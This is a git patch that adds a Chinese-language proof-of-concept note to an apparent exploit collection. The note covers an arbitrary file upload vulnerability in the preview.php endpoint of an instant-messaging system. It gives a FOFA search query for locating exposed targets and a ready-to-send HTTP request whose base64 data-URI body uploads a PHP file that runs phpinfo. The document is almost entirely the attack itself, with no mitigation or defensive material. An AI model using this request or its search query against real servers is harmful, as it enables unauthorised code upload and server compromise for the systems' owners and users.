From aea658f50ac27599e9cad03a2cc3a603f366ab73 Mon Sep 17 00:00:00 2001 From: Rainyseason <73454853+Rainyseason-c@users.noreply.github.com> Date: Mon, 21 Apr 2025 09:45:32 +0800 Subject: [PATCH] =?UTF-8?q?Create=20im=E5=8D=B3=E6=97=B6=E9=80=9A=E8=AE=AF?= =?UTF-8?q?=E7=B3=BB=E7=BB=9Fpreview.php=E5=89=8D=E5=8F=B0=E4=BB=BB?= =?UTF-8?q?=E6=84=8F=E2=BD=82=E4=BB=B6=E4=B8=8A=E4=BC=A0=E6=BC=8F=E6=B4=9E?= =?UTF-8?q?.md?= MIME-Version: 1.0 Content-Type: text/plain; charset=UTF-8 Content-Transfer-Encoding: 8bit --- ...im即时通讯系统preview.php前台任意⽂件上传漏洞.md | 26 +++++++++++++++++++ 1 file changed, 26 insertions(+) create mode 100644 wpoc/im即时通讯系统/im即时通讯系统preview.php前台任意⽂件上传漏洞.md diff --git a/wpoc/im即时通讯系统/im即时通讯系统preview.php前台任意⽂件上传漏洞.md b/wpoc/im即时通讯系统/im即时通讯系统preview.php前台任意⽂件上传漏洞.md new file mode 100644 index 0000000..04d229c --- /dev/null +++ b/wpoc/im即时通讯系统/im即时通讯系统preview.php前台任意⽂件上传漏洞.md @@ -0,0 +1,26 @@ +# im即时通讯系统preview.php前台任意⽂件上传漏洞 + +# 一、漏洞简介 +im即时通讯系统preview.php接口存在任意文件上传漏洞 + +# 三、资产测绘 ++ fofa`body="/superloginAction.html" || "im.smiaoshen.com"` + +# 四、漏洞复现 +```rust +GET /static/lib/webuploader/0.1.5/server/preview.php HTTP/1.1 +Host: +Upgrade-Insecure-Requests: 1 +User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 ( +KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,i +mage/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 +Accept-Encoding: gzip, deflate +Accept-Language: zh-CN,zh;q=0.9 +Cookie: su_webp=1; wp-settings-1=libraryContent%3Dbrowse; wp-settings-time +-1=1734956910 +Connection: close +Content-Length: 46 + +data:image/php;base64,PD9waHAgcGhwaW5mbygpOz8+ +```